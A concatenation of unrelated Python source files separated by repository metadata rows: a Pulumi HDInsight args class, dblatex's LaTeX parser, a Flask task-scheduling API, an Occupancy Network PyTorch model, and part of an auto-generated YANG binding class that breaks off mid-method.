                 subnet_id: Optional[pulumi.Input[str]] = None,
                 virtual_network_id: Optional[pulumi.Input[str]] = None):
        """
        :param pulumi.Input[str] username: The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] password: The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
        :param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        :param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
        """
        pulumi.set(__self__, "username", username)
        pulumi.set(__self__, "vm_size", vm_size)
        # Optional settings are only stored when explicitly provided.
        for attr, arg in (("password", password),
                          ("ssh_keys", ssh_keys),
                          ("subnet_id", subnet_id),
                          ("virtual_network_id", virtual_network_id)):
            if arg is not None:
                pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter
    def username(self) -> pulumi.Input[str]:
        """The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "username")

    @username.setter
    def username(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "username", new_value)

    @property
    @pulumi.getter(name="vmSize")
    def vm_size(self) -> pulumi.Input[str]:
        """The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "vm_size")

    @vm_size.setter
    def vm_size(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "vm_size", new_value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "password")

    @password.setter
    def password(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", new_value)

    @property
    @pulumi.getter(name="sshKeys")
    def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
        """A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created."""
        return pulumi.get(self, "ssh_keys")

    @ssh_keys.setter
    def ssh_keys(self, new_value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
        pulumi.set(self, "ssh_keys", new_value)

    @property
    @pulumi.getter(name="subnetId")
    def subnet_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "subnet_id")

    @subnet_id.setter
    def subnet_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "subnet_id", new_value)

    @property
    @pulumi.getter(name="virtualNetworkId")
    def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
        """The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created."""
        return pulumi.get(self, "virtual_network_id")

    @virtual_network_id.setter
    def virtual_network_id(self, new_value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "virtual_network_id", new_value)
@pulumi.input_type
class StormClusterStorageAccountArgs:
    """A storage-account attachment for an HDInsight Storm cluster."""

    def __init__(__self__, *,
                 is_default: pulumi.Input[bool],
                 storage_account_key: pulumi.Input[str],
                 storage_container_id: pulumi.Input[str]):
        """
        :param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Storm Cluster? Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
        :param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
        """
        # All three settings are required; store them in order.
        for attr, arg in (("is_default", is_default),
                          ("storage_account_key", storage_account_key),
                          ("storage_container_id", storage_container_id)):
            pulumi.set(__self__, attr, arg)

    @property
    @pulumi.getter(name="isDefault")
    def is_default(self) -> pulumi.Input[bool]:
        """Is this the Default Storage Account for the HDInsight Storm Cluster? Changing this forces a new resource to be created."""
        return pulumi.get(self, "is_default")

    @is_default.setter
    def is_default(self, new_value: pulumi.Input[bool]):
        pulumi.set(self, "is_default", new_value)

    @property
    @pulumi.getter(name="storageAccountKey")
    def storage_account_key(self) -> pulumi.Input[str]:
        """The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_account_key")

    @storage_account_key.setter
    def storage_account_key(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "storage_account_key", new_value)

    @property
    @pulumi.getter(name="storageContainerId")
    def storage_container_id(self) -> pulumi.Input[str]:
        """The ID of the Storage Container. Changing this forces a new resource to be created."""
        return pulumi.get(self, "storage_container_id")

    @storage_container_id.setter
    def storage_container_id(self, new_value: pulumi.Input[str]):
        pulumi.set(self, "storage_container_id", new_value)
| 43.995349 | 228 | 0.673851 |
ace0a105bdf8f4e4a0e6bb418a3a033b2abc12e2 | 4,278 | py | Python | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | 1 | 2017-12-29T23:23:14.000Z | 2017-12-29T23:23:14.000Z | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | null | null | null | lib/dblatex-0.3.2/lib/dbtexmf/dblatex/grubber/texparser.py | jonathanmorley/HR-XSL | 799b1075cbec4cda3d686d588eea92a62d59963f | [
"Apache-2.0"
] | null | null | null | # This file is part of Rubber and thus covered by the GPL
# (c) Emmanuel Beffara, 2002--2006
"""
LaTeX document building system for Rubber.
This module defines the class that parses the input LaTeX to load the expected
modules.
"""
import re
class TexParser:
    """Minimal LaTeX scanner that drives module loading.

    This is not a full parser: it only recognises a small set of macro
    calls (the keys of ``self.hooks``) and invokes the registered handler
    for each occurrence, so the document object can load the matching
    support modules.
    """

    # \input with no braces: the argument runs up to the next space,
    # brace or backslash.
    re_input = re.compile("\\\\input +(?P<arg>[^{} \n\\\\]+)")
    # Splits a line into its code part (group "line") and an optional
    # trailing TeX comment, while leaving escaped \% intact.
    re_comment = re.compile(r"(?P<line>([^\\%]|\\%|\\)*)(%.*)?")

    def __init__(self, doc):
        # doc: the document object on which modules are registered.
        self.doc = doc
        self.comment_mark = "%"
        self.exclude_mods = []
        # Macro name -> handler; extended at runtime via add_hook().
        self.hooks = {
            "usepackage" : self.h_usepackage,
            "begin{btSect}": self.h_bibtopic,
        }
        self.update_rehooks()

    def update_rehooks(self):
        """
        Update the regular expression used to match macro calls using the keys
        in the `hook' dictionary. We don't match all control sequences for
        obvious efficiency reasons.
        """
        # Make a "foo|bar\*stub" list (escape any literal '*' in hook names)
        hooklist = [x.replace("*", "\\*") for x in self.hooks]
        # Matches \name, an optional starred form, an optional [opt]
        # argument and an optional {arg} argument.
        pattern = "\\\\(?P<name>%s)\*?"\
                  " *(\\[(?P<opt>[^\\]]*)\\])?"\
                  " *({(?P<arg>[^{}]*)}|(?=[^A-Za-z]))"
        self.rehooks = re.compile(pattern % "|".join(hooklist))

    def add_hook(self, name, fun):
        """
        Register a given function to be called (with no arguments) when a
        given macro is found.
        """
        self.hooks[name] = fun
        # The combined regex must be rebuilt to include the new macro name.
        self.update_rehooks()

    def parse(self, fd, exclude_mods=None):
        """
        Process a LaTeX source. The file must be open; it is read to the end,
        calling the registered handlers for the macro calls found.

        :param fd: an open, iterable file object containing LaTeX source.
        :param exclude_mods: optional list of module names that must not be
            registered even when their macros are encountered.
        """
        self.exclude_mods = exclude_mods or []
        self.lineno = 0
        for line in fd:
            self.parse_line(line)

    def parse_line(self, line, dump=None):
        """
        Scan a single source line for hooked macro calls, invoking the
        handler for each match in order. If `dump' is not None it is a
        stream on which all text not matched as a macro is written.
        """
        self.lineno += 1
        # Remove comments
        line = self.re_comment.match(line).group("line")
        match = self.rehooks.search(line)
        while match:
            # NOTE(review): `dict` shadows the builtin; kept as-is because
            # handlers receive and mutate this mapping by convention.
            dict = match.groupdict()
            name = dict["name"]
            # The case of \input is handled specifically, because of the
            # TeX syntax with no braces
            if name == "input" and not dict["arg"]:
                match2 = self.re_input.search(line)
                if match2:
                    match = match2
                    dict = match.groupdict()
            if dump: dump.write(line[:match.start()])
            # Hand the handler the matched text, the remainder of the line
            # (which it may rewrite), a position record and the dump stream.
            dict["match"] = line[match.start():match.end()]
            dict["line"] = line[match.end():]
            #dict["pos"] = { 'file': self.vars["file"], 'line': self.lineno }
            dict["pos"] = { 'file': "file", 'line': self.lineno }
            dict["dump"] = dump
            # if self.env.caching:
            #     self.cache_list.append(("hook", name, dict))
            self.hooks[name](dict)
            # Continue scanning from whatever the handler left in "line".
            line = dict["line"]
            match = self.rehooks.search(line)
        if dump: dump.write(line)

    def h_usepackage(self, dict):
        """
        Called when a \\usepackage macro is found. Each comma-separated
        package name in the argument is registered as a module on the
        document, unless it appears in `exclude_mods'.
        """
        if not dict["arg"]: return
        for name in dict["arg"].split(","):
            name = name.strip()
            # file = self.env.find_file(name + ".sty")
            # if file and not exists(name + ".py"):
            #     self.process(file)
            # else:
            if (name in self.exclude_mods):
                continue
            self.doc.modules.register(name, dict)

    def h_bibtopic(self, dict):
        """
        Called when a \\btSect macro is found. It can also be loaded by a
        usepackage of bibtopic. Note that once loaded the btSect hook will be
        preempted by the bibtopic module hook.
        """
        if ("bibtopic" in self.exclude_mods):
            return
        self.doc.modules.register("bibtopic", dict)
| 33.952381 | 79 | 0.544647 |
ace0a193a7f4766d08e5911e9b147c182572a1bd | 929 | py | Python | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | 2 | 2020-10-25T23:38:28.000Z | 2020-10-28T02:56:08.000Z | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | null | null | null | src/endpoints.py | felipeagger/task-scheduler-py | 804f7a3177afa53e3aa7fe89551ca92a75f882ee | [
"BSD-2-Clause"
] | 1 | 2020-12-10T16:02:35.000Z | 2020-12-10T16:02:35.000Z | from flask import request
from src.app import app
from src.tasks import get_request, get_request_with_retry
from src.settings import URL
@app.route('/', methods=['GET'])
def health_check():
    """Liveness probe: report that the service is running."""
    status_message = 'Running'
    return status_message
@app.route('/task', methods=['GET'])
def task():
    """Run the get_request task synchronously and return its body."""
    print('start task get_request')
    pending = get_request(URL, 'endpoint immediate')
    _status, payload = pending(blocking=True)
    return {'data': payload}
@app.route('/schedule', methods=['GET'])
def schedule():
    """Queue get_request to run 5 seconds from now."""
    print('schedule task get_request -> 5s')
    task_kwargs = {'url': URL, 'origin': 'scheduled'}
    get_request.schedule(kwargs=task_kwargs, delay=5)
    return 'task scheduled'
@app.route('/retry', methods=['GET'])
def retry():
    """Run get_request_with_retry synchronously.

    Returns the task's response body on success, or an HTTP 500 response
    once the task's retry budget is exhausted.
    """
    print('start task get_request_with_retry')
    try:
        new_task = get_request_with_retry(URL)
        status, body = new_task(blocking=True)
        return {'data': body}
    # Was a bare `except:`, which also swallows SystemExit and
    # KeyboardInterrupt; narrowed to Exception at this request boundary.
    except Exception:
        return 'failing to test retry!', 500
| 22.119048 | 77 | 0.664155 |
ace0a1a3c52c72f07dcc3d117836f75e5129a78f | 4,495 | py | Python | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | im2mesh/onet/models/__init__.py | scottsorensenvision/occupancy_networks | 8dc1d37fa73ef0a87f9f64f830b5f759197d4707 | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from torch import distributions as dist
from im2mesh.onet.models import encoder_latent, decoder
# Encoder latent dictionary
# Maps a config-file key to the latent-encoder class it selects.
encoder_latent_dict = {
    'simple': encoder_latent.Encoder,
}

# Decoder dictionary
# Maps a config-file key to the decoder class it selects.
decoder_dict = {
    'simple': decoder.Decoder,
    'cbatchnorm': decoder.DecoderCBatchNorm,
    'cbatchnorm2': decoder.DecoderCBatchNorm2,
    'batchnorm': decoder.DecoderBatchNorm,
    'cbatchnorm_noresnet': decoder.DecoderCBatchNormNoResnet,
}
class OccupancyNetwork(nn.Module):
    ''' Occupancy Network class.

    Wraps an (optional) input encoder, an (optional) latent encoder and a
    decoder into a single conditional occupancy model p(occ | p, z, c).

    Args:
        decoder (nn.Module): decoder network
        encoder (nn.Module): encoder network
        encoder_latent (nn.Module): latent encoder network
        p0_z (dist): prior distribution for latent code z
        device (device): torch device
    '''

    def __init__(self, decoder, encoder=None, encoder_latent=None, p0_z=None,
                 device=None):
        super().__init__()
        if p0_z is None:
            # Zero-dimensional Normal: degenerate prior used when the model
            # is run without a latent code z.
            p0_z = dist.Normal(torch.tensor([]), torch.tensor([]))

        self.decoder = decoder.to(device)

        if encoder_latent is not None:
            self.encoder_latent = encoder_latent.to(device)
        else:
            self.encoder_latent = None

        if encoder is not None:
            self.encoder = encoder.to(device)
        else:
            self.encoder = None

        # Cached so later tensors (e.g. sampled z) land on the same device.
        self._device = device
        self.p0_z = p0_z

    def forward(self, p, inputs, sample=True, **kwargs):
        ''' Performs a forward pass through the network.

        Encodes the conditioning input, draws z from the prior, and decodes
        occupancy probabilities at the query points.

        Args:
            p (tensor): sampled points
            inputs (tensor): conditioning input
            sample (bool): whether to sample for z

        Returns:
            dist.Bernoulli: occupancy distribution at the points p.
        '''
        batch_size = p.size(0)
        c = self.encode_inputs(inputs)
        z = self.get_z_from_prior((batch_size,), sample=sample)
        p_r = self.decode(p, z, c, **kwargs)
        return p_r

    def compute_elbo(self, p, occ, inputs, **kwargs):
        ''' Computes the expectation lower bound.

        Args:
            p (tensor): sampled points
            occ (tensor): occupancy values for p
            inputs (tensor): conditioning input

        Returns:
            tuple: (elbo, rec_error, kl), each summed over the last axis.
        '''
        c = self.encode_inputs(inputs)
        q_z = self.infer_z(p, occ, c, **kwargs)
        # rsample keeps the draw differentiable (reparameterization trick).
        z = q_z.rsample()
        p_r = self.decode(p, z, c, **kwargs)

        rec_error = -p_r.log_prob(occ).sum(dim=-1)
        kl = dist.kl_divergence(q_z, self.p0_z).sum(dim=-1)
        elbo = -rec_error - kl

        return elbo, rec_error, kl

    def encode_inputs(self, inputs):
        ''' Encodes the input.

        Args:
            input (tensor): the input

        Returns:
            tensor: latent conditioned code c; an empty (batch, 0) tensor
            when no encoder is configured.
        '''
        if self.encoder is not None:
            # import pdb; pdb.set_trace()
            c = self.encoder(inputs)
        else:
            # Return inputs?
            c = torch.empty(inputs.size(0), 0)

        return c

    def decode(self, p, z, c, **kwargs):
        ''' Returns occupancy probabilities for the sampled points.

        Args:
            p (tensor): points
            z (tensor): latent code z
            c (tensor): latent conditioned code c

        Returns:
            dist.Bernoulli: distribution parameterized by decoder logits.
        '''
        logits = self.decoder(p, z, c, **kwargs)
        p_r = dist.Bernoulli(logits=logits)
        return p_r

    def infer_z(self, p, occ, c, **kwargs):
        ''' Infers z.

        Args:
            p (tensor): points tensor
            occ (tensor): occupancy values for occ
            c (tensor): latent conditioned code c

        Returns:
            dist.Normal: approximate posterior q(z | p, occ, c); degenerate
            (zero-dimensional) when no latent encoder is configured.
        '''
        if self.encoder_latent is not None:
            mean_z, logstd_z = self.encoder_latent(p, occ, c, **kwargs)
        else:
            batch_size = p.size(0)
            mean_z = torch.empty(batch_size, 0).to(self._device)
            logstd_z = torch.empty(batch_size, 0).to(self._device)

        q_z = dist.Normal(mean_z, torch.exp(logstd_z))
        return q_z

    def get_z_from_prior(self, size=torch.Size([]), sample=True):
        ''' Returns z from prior distribution.

        Args:
            size (Size): size of z
            sample (bool): whether to sample (otherwise the prior mean is
                expanded to the requested size)
        '''
        if sample:
            z = self.p0_z.sample(size).to(self._device)
        else:
            z = self.p0_z.mean.to(self._device)
            z = z.expand(*size, *z.size())

        return z

    def to(self, device):
        ''' Puts the model to the device.

        Args:
            device (device): pytorch device

        Returns:
            OccupancyNetwork: the moved model (for chaining).
        '''
        model = super().to(device)
        # Keep the cached device in sync so freshly created tensors follow.
        model._device = device
        return model
| 28.630573 | 77 | 0.570857 |
ace0a22cad2c72a11817d71e9429fdd508313a4c | 55,201 | py | Python | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | null | null | null | pybind/slxos/v17r_2_00/bridge_domain_state/bridge_domain_list/__init__.py | extremenetworks/pybind | 44c467e71b2b425be63867aba6e6fa28b2cfe7fb | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import outer_vlan_list
class bridge_domain_list(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-nsm-operational - based on the path /bridge-domain-state/bridge-domain-list. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: bridge domain node
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__bd_id','__vc_id','__active_ac_lif_count','__config_ac_lif_count','__active_vfi_lif_count','__config_vfi_lif_count','__local_switching','__block_bpdu','__bd_type','__ve_ifindex','__ve_id','__pw_profile','__mac_limit','__statistics','__mac_addr_withdrawal','__mct_enabled','__description','__outer_vlan_list',)
_yang_name = 'bridge-domain-list'
_rest_name = 'bridge-domain-list'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__description = YANGDynClass(base=unicode, is_leaf=True, yang_name="description", rest_name="description", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
self.__pw_profile = YANGDynClass(base=unicode, is_leaf=True, yang_name="pw-profile", rest_name="pw-profile", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='string', is_config=False)
self.__ve_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-id", rest_name="ve-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__bd_type = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="bd-type", rest_name="bd-type", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__mac_addr_withdrawal = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mac-addr-withdrawal", rest_name="mac-addr-withdrawal", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__bd_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__config_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-ac-lif-count", rest_name="config-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__block_bpdu = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="block-bpdu", rest_name="block-bpdu", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__active_ac_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-ac-lif-count", rest_name="active-ac-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__mct_enabled = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mct-enabled", rest_name="mct-enabled", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__statistics = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="statistics", rest_name="statistics", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
self.__vc_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__outer_vlan_list = YANGDynClass(base=YANGListType("outer_vlan",outer_vlan_list.outer_vlan_list, yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='outer-vlan', extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}), is_container='list', yang_name="outer-vlan-list", rest_name="outer-vlan-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'nsm-bd-vlan-tag-info', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='list', is_config=False)
self.__mac_limit = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="mac-limit", rest_name="mac-limit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__config_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="config-vfi-lif-count", rest_name="config-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__ve_ifindex = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="ve-ifindex", rest_name="ve-ifindex", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
self.__active_vfi_lif_count = YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="active-vfi-lif-count", rest_name="active-vfi-lif-count", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint16', is_config=False)
self.__local_switching = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="local-switching", rest_name="local-switching", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='boolean', is_config=False)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'bridge-domain-state', u'bridge-domain-list']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'bridge-domain-state', u'bridge-domain-list']
def _get_bd_id(self):
"""
Getter method for bd_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_id (uint32)
YANG Description: BD id
"""
return self.__bd_id
def _set_bd_id(self, v, load=False):
"""
Setter method for bd_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/bd_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_bd_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bd_id() directly.
YANG Description: BD id
"""
parent = getattr(self, "_parent", None)
if parent is not None and load is False:
raise AttributeError("Cannot set keys directly when" +
" within an instantiated list")
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bd_id must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)""",
})
self.__bd_id = t
if hasattr(self, '_set'):
self._set()
def _unset_bd_id(self):
self.__bd_id = YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="bd-id", rest_name="bd-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
def _get_vc_id(self):
"""
Getter method for vc_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/vc_id (uint32)
YANG Description: vc id
"""
return self.__vc_id
def _set_vc_id(self, v, load=False):
"""
Setter method for vc_id, mapped from YANG variable /bridge_domain_state/bridge_domain_list/vc_id (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_vc_id is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_vc_id() directly.
YANG Description: vc id
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="vc-id", rest_name="vc-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:brocade.com:mgmt:brocade-nsm-operational', defining_module='brocade-nsm-operational', yang_type='uint32', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """vc_id must be of a type compatible with uint32""",
'defined-type': "uint32",
